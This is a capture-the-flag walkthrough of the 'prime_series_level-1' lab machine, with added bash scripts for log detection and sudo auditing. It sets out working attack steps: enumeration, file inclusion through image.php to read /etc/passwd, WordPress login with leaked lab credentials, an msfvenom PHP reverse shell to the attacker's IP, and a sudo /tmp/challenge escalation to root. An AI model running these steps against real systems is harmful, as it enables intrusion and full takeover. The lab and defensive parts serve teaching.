prime_series_level-1
2022-07-23 21:33:00 【Headwind/】
Target download
Network mode: NAT
arp-scan -l
nmap -p 1-65535 -A 192.168.194.157
Visit the HTTP service

dirb http://192.168.194.157

Run dirb again, filtering by file extension with the -X parameter
dirb http://192.168.194.157 -X .txt,.php,.zip


fuzz
location.txt
PHP pages:
http://192.168.194.157/image.php
http://192.168.194.157/index.php


Enumerate users with wpscan
wpscan --url http://192.168.194.157/wordpress/ --enumerate u
This finds the user victor
Use the wfuzz that ships with Kali
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.194.157/index.php?FUZZ

Filter out responses with 12 words
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.194.157/index.php?FUZZ

Try it
http://192.168.194.157/index.php?file=location.txt

The correct parameter is secrettier360. It does not work on the first PHP page; the other one is the right one
http://192.168.194.157/image.php?secrettier360=location.txt

Use it
http://192.168.194.157/image.php?secrettier360=/etc/passwd

Use curl so that line breaks are preserved
curl http://192.168.194.157/image.php?secrettier360=/etc/passwd

http://192.168.194.157/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec
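
The requests above leave a recognisable trail in the web server's access log: many bare parameter names against index.php, then filesystem paths passed to secrettier360. The following detection script is an added example, not part of the original write-up; the log lines are constructed in combined log format, and the function names and threshold are assumptions.

```bash
# Added example. Log lines are constructed (combined log format);
# function names and the default threshold are assumptions.
sample_log() {
cat <<'EOF'
192.168.194.156 - - [23/Jul/2022:21:01:01 +0000] "GET /index.php?admin HTTP/1.1" 200 136 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:01:01 +0000] "GET /index.php?backup HTTP/1.1" 200 136 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:01:02 +0000] "GET /index.php?file HTTP/1.1" 200 206 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:01:02 +0000] "GET /index.php?id HTTP/1.1" 200 136 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:01:02 +0000] "GET /index.php?test HTTP/1.1" 200 136 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:05:10 +0000] "GET /index.php?file=location.txt HTTP/1.1" 200 334 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:06:30 +0000] "GET /image.php?secrettier360=location.txt HTTP/1.1" 200 197 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:07:12 +0000] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2543 "-" "-"
192.168.194.156 - - [23/Jul/2022:21:08:40 +0000] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 230 "-" "-"
192.168.194.1 - - [23/Jul/2022:21:09:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 9120 "-" "-"
EOF
}

# Print "ip script param value" for query values that look like filesystem paths
# (absolute path or ../ traversal, including %2f / %2e encoded forms).
flag_path_values() {
  awk '{
    n = split($7, u, "?"); if (n < 2) next
    m = split(u[2], pairs, "&")
    for (i = 1; i <= m; i++) {
      eq = index(pairs[i], "="); if (eq == 0) continue
      name = substr(pairs[i], 1, eq - 1)
      val = tolower(substr(pairs[i], eq + 1))
      gsub(/%2f/, "/", val); gsub(/%2e/, ".", val)
      if (val ~ /^\// || val ~ /\.\.\//) print $1, u[1], name, val
    }
  }'
}

# Print "ip script count" when one client tries at least $1 distinct
# parameter names against the same script (parameter-name fuzzing).
flag_param_fuzzing() {
  awk -v min="${1:-5}" '{
    n = split($7, u, "?"); if (n < 2) next
    m = split(u[2], pairs, "&"); key = $1 " " u[1]
    for (i = 1; i <= m; i++) {
      name = pairs[i]; sub(/=.*/, "", name)
      if (!((key, name) in seen)) { seen[key, name] = 1; count[key]++ }
    }
  } END { for (k in count) if (count[k] >= min) print k, count[k] }'
}
```

On a real server, pipe the access log into either function instead of sample_log, and raise the threshold well above 5 for sites with many legitimate parameters.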
WordPress admin login
http://192.168.194.157/wordpress/wp-login.php
victor
follow_the_ippsec

In the theme editor, secret.php is writable
Generate a reverse shell with msfvenom
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.194.156 lport=7777 -o shell.php
use exploit/multi/handler
set Payload php/meterpreter/reverse_tcp
set LHOST 192.168.194.156
set lport 7777
run

http://192.168.194.157/wordpress/wp-content/themes/twentynineteen/secret.php

Privilege escalation
Interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
/opt/backup/server_database
cat backup_pass
enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
tribute_to_ippsec
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
How the privilege escalation works: create the file /tmp/challenge, copy /bin/bash into it, then run sudo /home/victor/undefeated_victor again to get a shell with root privileges.
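
From the defender's side, the flaw is that a script run as root through sudo executes /tmp/challenge, a path any user can create. The audit below is an added example, not part of the original write-up; it lists the absolute paths referenced by a sudo-permitted script that an unprivileged user could create or replace. It checks world-writable permissions only, and its function names are assumptions.

```bash
# Added example: audit a script that sudoers lets a user run as root.
# Scope (assumption): only world-writable locations are checked,
# not group-writable or user-owned ones.

# find -L follows symlinks, so /bin -> /usr/bin is judged by its target.
is_world_writable() { [ -n "$(find -L "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]; }
is_sticky()         { [ -n "$(find -L "$1" -maxdepth 0 -perm -1000 2>/dev/null)" ]; }

# Return 0 if an unprivileged user could create or replace the file at path $1.
replaceable() {
  local p="$1" parent
  if [ -e "$p" ]; then
    parent=$(dirname "$p")
    is_world_writable "$p" && return 0
    # Without the sticky bit, anyone may delete and recreate the file.
    is_world_writable "$parent" && ! is_sticky "$parent" && return 0
    return 1
  fi
  # Missing file (the /tmp/challenge case): whoever can write to the
  # nearest existing directory can create it.
  while [ ! -d "$p" ]; do p=$(dirname "$p"); done
  is_world_writable "$p"
}

# Print every absolute path referenced in script $1 that is replaceable.
audit_sudo_script() {
  local ref
  grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u | while read -r ref; do
    if replaceable "$ref"; then echo "$ref"; fi
  done
}

# Usage: ./audit.sh /home/victor/undefeated_victor
if [ "$#" -gt 0 ]; then audit_sudo_script "$1"; fi
```

Any path it prints should be moved to a root-owned directory, or the sudoers entry removed.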